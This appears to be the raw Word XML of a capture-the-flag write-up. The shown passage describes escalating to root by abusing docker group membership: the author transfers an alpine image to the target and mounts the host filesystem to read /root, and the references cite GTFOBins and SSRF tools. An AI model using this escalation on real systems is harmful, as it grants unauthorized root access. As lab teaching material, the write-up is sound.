      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can obtain the first flag.</w:t>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838200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="53"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9436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capturing the first flag, it is necessary to escalate privileges to access the root flag. By executing the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we observe that the user belongs to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">docker</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> group. With this knowledge, it is possible to escalate privileges by mounting the host’s filesystem inside a container, allowing access to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory and the final flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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876300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="41"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executing the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">docker images</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to list available images, we observe that there are no images present on the server. Therefore, it is necessary to download an image on our local machine and transfer it to the target server to proceed with privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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723900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="45"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943600" cy="723900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1117600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="43"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downloading the image, we use the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo docker save alpine &gt; alpine.tar </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to save the image into a file. Then, we start a local HTTP server using Python to transfer the file to the target server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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20800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="63"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016000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58"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image on the server, we can execute the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">docker load &lt; alpine.tar </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to load the image into Docker on the target server. After loading, we use the image to mount the host’s entire filesystem, allowing access to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory where the final flag is located.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="965200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60"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5943600" cy="965200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="838200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="55"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5943600" cy="838200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">References:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId33">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://blog.crowsec.com.br/ssrf-protocol-smuggling/</w:t>
          <w:br w:type="textWrapping"/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId34">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://docs.docker.com/reference/cli/docker/image/save/</w:t>
          <w:br w:type="textWrapping"/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId35">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://docs.docker.com/reference/cli/docker/image/load/</w:t>
          <w:br w:type="textWrapping"/>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId36">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://gtfobins.github.io/gtfobins/docker/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">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headerReference r:id="rId37" w:type="default"/>
      <w:headerReference r:id="rId38" w:type="first"/>
      <w:headerReference r:id="rId39" w:type="even"/>
      <w:footerReference r:id="rId40" w:type="default"/>
      <w:footerReference r:id="rId41" w:type="first"/>
      <w:footerReference r:id="rId42"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40">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="6"/>
    <w:bookmarkEnd w:id="6"/>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-866771</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>95250</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="719138" cy="232221"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="57" name="image18.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image18.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41">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42">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15.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-942971</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>0</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7820025" cy="10085729"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="42" name="image3.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image3.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-339720</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5776596</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6677025" cy="3000910"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="40"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Exposed</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-339720</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5776596</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6677025" cy="3000910"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="40" name="image27.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image27.png"/>
                      <pic:cNvPicPr preferRelativeResize="0"/>
                    </pic:nvPicPr>
                    <pic:blipFill>
                      <a:blip r:embed="rId2"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </pic:blipFill>
                    <pic:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="6677025" cy="300091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15.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9.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.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image" Target="media/image1.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.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4.png"/><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25.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carlosevieira/git-dumper" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.crowsec.com.br/ssrf-protocol-smuggling/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.docker.com/reference/cli/docker/image/load/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.docker.com/reference/cli/docker/image/save/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/docker/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/tarunkant/Gopherus" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.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8.jpg"/><Relationship Id="rId2"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7.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3BiFlr4/8BeOEiVauMqRPWosmw==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLjZnanl5Znd5aXUwMjIOaC40b2t4M3c3am42bWgyDWguczZsYTU0OTMzdW0yDmguNHJhMzRpdml2Y2Y5Mg5oLmQ4ejl4eThjMnRwdDIOaC4xNzVmNWNzOTR6MG84AHIhMVd2TW5tOUltZ3hWdXZmaHhYY1M0SkVIeFVDczAxNDhx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